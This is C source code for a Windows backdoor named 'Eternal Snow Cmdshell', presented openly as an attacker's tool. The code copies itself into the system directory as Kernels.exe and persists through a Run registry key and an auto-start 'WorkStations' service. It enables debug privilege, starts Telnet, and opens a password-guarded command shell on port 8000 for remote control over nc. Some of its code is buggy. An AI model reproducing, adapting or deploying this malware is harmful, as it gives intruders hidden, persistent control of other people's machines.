Delphiscn Eternal Snow Cmdshell Version 1.0

/*

Delphiscn Eternal Snow Cmdshell Version 1.0

This Backdoor is written by Delphiscn.It is support for Windows NT/2000/XP/2003.
You can use a nc to control a remote computer which is runing with this software.

Complied and Tested in Windows XP SP2 CN     2000/2003 NOT TESTED.

Can not run in Windows 98/ME

Details

Eternal snow will create a service(Workstations) on the Remote System. And Bind Service Computer on port 8000.

Then . It will also Try to Start Telnet Service in the Remote System which is support for NT.

An Attacker can control it IF he konw the password --Neverland.

Referrence

1.msdn

2.www.xFocus.org

More Information

Delphiscn@www.EvilOctal.com
cnBlater(at)hotmail(dot)com
http://spaces.msn.com/members/delphiscn

2005-08-15*/

#include<winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsvc.h>
#include <Psapi.h>
#pragma comment( lib,"Psapi.lib")
#pragma comment(lib, "ws2_32.lib")

#define password "Neverland"
   
BOOL reg(char *szExecFile);
void OnCreate();
void StartTelnet();
void Help();

BOOL reg(char *szExecFile)
{
    HKEY hKEY;
    LPCTSTR data_Set="SOFTWARE//Microsoft//Windows//CurrentVersion//Run//";
          long snow0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
          if(snow0!=ERROR_SUCCESS) return(false);
          LPBYTE username_Get=(unsigned char*)malloc(sizeof(BYTE)*80);
          DWORD cbData_1=80;
    DWORD dwType;
          long snow1=::RegQueryValueEx(hKEY,"Dlls", 0,&dwType, username_Get,&cbData_1);
    if(snow1!=ERROR_SUCCESS)
    {
              DWORD setsize;
              setsize=strlen(szExecFile)+1;
        dwType=REG_SZ;
              long snow3=::RegSetValueEx(hKEY,"Kernels", 0, dwType, (const unsigned char*) szExecFile, setsize);
              if(snow3!=ERROR_SUCCESS) {return(false);}
    }
          free(username_Get);  
          ::RegCloseKey(hKEY);
          return(true);
}

int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable)
/*
Thanks to Sunlion[E.S.T]
*/
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
    TOKEN_QUERY | TOKEN_READ,&hToken))
    return 0;
    if(!LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid))
    return 1;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;
    AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);
    CloseHandle(hToken);
    return 0;
}

void Help()
{
  printf("Eternal Sonw Cmdshell in Windows NT System Support For 2000/XP/2003 Version 1.0/n");
  printf("CODE BY Delphiscn@www.EvilOctal.com E-mail:cnBlaster(at)hotmail(dot)com/n");
  printf("Complied in Windows XP SP2 CN 2005-08");
  return;
}

int main(int argc,char *argv[])
{
    GetModuleFileName(NULL,argv[0],255);    
    char szNewPlace[255];                  
          GetSystemDirectory(szNewPlace,255);          
    strcat(szNewPlace,"//Kernels.exe");        
    if( strcmp(argv[0],szNewPlace) != 0 )
    {CopyFile(argv[0],szNewPlace,FALSE);}
          if(!reg(szNewPlace))                
    {return 0;}
          OnCreate();
          StartTelnet();
          system("cls.exe");
          Help();
    WSADATA wsaData;
    char buff[4096];
    int Eternal;
    if ((Eternal = WSAStartup(MAKEWORD(2,2), &wsaData)) != 0)
        {
              printf("WSAStartup Failed: %d/n",Eternal);
              return -1;
        }
    int port=8000;
    int RemoteServer,LocalClient;
    struct sockaddr_in addrServer,addrClient;
    char *MSG="/n/r Welcome Hacker";
    char *getpass="/r/n Your Password is:";
    char *passok="/r/n ok";
    char *error="/r/n Error Password Please Try it again";
          RemoteServer=socket(AF_INET,SOCK_STREAM,0);
    addrServer.sin_family=AF_INET;
    addrServer.sin_port=htons(port);
    addrServer.sin_addr.s_addr=ADDR_ANY;
    int TimeOut=50000;
    setsockopt(RemoteServer,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut));
    UINT bReUser=1;
    setsockopt(RemoteServer,SOL_SOCKET,SO_REUSEADDR,(char*)&bReUser,sizeof(bReUser));
    bind(RemoteServer,(struct sockaddr*)&addrServer,sizeof(addrServer));
    listen(RemoteServer,5);
    printf("Bind Server is OK/n%d",port);
    int iLen=sizeof(addrClient);
    LocalClient=accept(RemoteServer,(struct sockaddr*)&addrClient,&iLen);
    if (LocalClient != INVALID_SOCKET)
    {
        int iTimeOut=50000;
        setsockopt(LocalClient,SOL_SOCKET,SO_RCVTIMEO,(char*)&iTimeOut,sizeof(iTimeOut));
    }
    else return -1;
    send(LocalClient,MSG,strlen(MSG),0);
    send(LocalClient,getpass,strlen(getpass),0);
    recv(LocalClient,buff,1024,0);
    if(!(strstr(buff,password)))
    {
          send(LocalClient, error, strlen(error), 0);
          printf("/r/n PassWord ERROR!");
          closesocket(LocalClient);
    }
    send(LocalClient, passok, strlen(passok), 0);
    HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
          unsigned long lBytesRead;
          SECURITY_ATTRIBUTES sa;
    sa.nLength=12;
    sa.lpSecurityDescriptor=0;
    sa.bInheritHandle=TRUE;
    CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
    CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
          STARTUPINFO siinfo;
    char cmdLine[] = "Kernels.exe";
    PROCESS_INFORMATION ProcessInformation;
    ZeroMemory(&siinfo,sizeof(siinfo));
    siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    siinfo.wShowWindow = SW_HIDE;
    siinfo.hStdInput = hReadPipe2;        
    siinfo.hStdOutput = siinfo.hStdError = hWritePipe1;
    printf("/r/n Pipe Create OK!");
    int bread = CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
    while(1)
    {
        int ret = PeekNamedPipe(hReadPipe1,buff,1024,&lBytesRead,0,0);
        if(lBytesRead)
              {
                  ret = ReadFile(hReadPipe1,buff,lBytesRead,&lBytesRead,0);
                  if(!ret) break;  
                  ret = send(LocalClient,buff,lBytesRead,0);
                      if(ret <= 0) break;
              }              
        else
              {

                  lBytesRead = recv(LocalClient,buff,1024,0);
                  if(lBytesRead <= 0) break;
                  ret = WriteFile(hWritePipe2,buff,lBytesRead,&lBytesRead,0);
              }
    }
    closesocket(LocalClient);
    closesocket(RemoteServer);
    return 0;
}

void OnCreate()
{
      char szNewPlace[255];                  
          GetSystemDirectory(szNewPlace,255);
          strcat(szNewPlace,"//Kernels.exe");
          EnablePrivilege(SE_DEBUG_NAME,TRUE);
                      SC_HANDLE scm;
    SC_HANDLE scv;
          scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
          if (scm!=NULL)
  {
    scv=::CreateService(scm,
    "WorkStations",
    "WorkStations",
    SERVICE_ALL_ACCESS,
    SERVICE_WIN32_OWN_PROCESS,SERVICE_INTERACTIVE_PROCESS,
    SERVICE_AUTO_START,
    SERVICE_ERROR_IGNORE,
    szNewPlace,
    NULL,NULL,NULL,NULL);
    if (scv!=NULL)
    {
        ::CloseServiceHandle(scv);
    }
    else
    {
        ::CloseServiceHandle(scm);
    }
  }
}

void StartTelnet()
{
  EnablePrivilege(SE_DEBUG_NAME,TRUE);
    SC_HANDLE scm;
    SC_HANDLE scv;
  scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
  if(scm!=NULL)
  {
    scv=::OpenService(scm,"Telnet",SERVICE_ALL_ACCESS);
    if (scv!=NULL)
    {
        ::StartService(scv,0,NULL);
        ::CloseServiceHandle(scv);
    }
    ::CloseServiceHandle(scm);
  }
}

/*

Complied with Visual C++.Net

Good Luck ^.^

*/